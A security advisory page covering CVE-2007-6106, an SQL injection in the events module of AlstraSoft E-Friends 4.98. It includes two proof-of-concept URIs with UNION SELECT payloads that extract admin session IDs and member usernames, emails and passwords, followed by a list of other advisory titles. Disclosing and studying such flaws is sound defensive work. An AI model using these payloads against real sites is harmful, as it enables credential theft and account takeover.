exploits , vulnerabilities , articles , AlstraSoft E-Friends Events Module SQL Injection Vulnerability

Title	AlstraSoft E-Friends Events Module SQL Injection Vulnerability
Published	2007-11-21-12:00AM
Updated	2007-12-18-08:06PM
Class	Input Validation Error
CVE	CVE-2007-6106
Remote	Yes
Local	No
Credit	M.Hasran Addahroni is credited with the discovery of this vulnerability.
Vulnerable	AlstraSoft EFriends 4.98
Not Vulnerable
Code	Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin-- http://www.example.com/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,concat(mem_id,0x3a,username,0x3a,email,0x3a,password,0x3a,fname),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20members--
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-11 Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Perl CGI Executables Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Unspecified Stack Buffer Overflow Vulnerability
• 2009-12-11 Joomla! JS Jobs Component Multiple SQL Injection Vulnerabilities
• 2009-12-11 RT Session Fixation Vulnerability
• 2009-12-11 Multiple HP LaserJet Printers Unauthorized Access and Denial of Service Vulnerability
• 2009-12-11 Sun Ray Server Authentication Manager Remote Code Execution Vulnerability
• 2009-12-10 GNU Coreutils Insecure Temporary File Creation Vulnerability
• 2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
• 2009-12-10 Moodle Multiple Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 02:36:07 +0000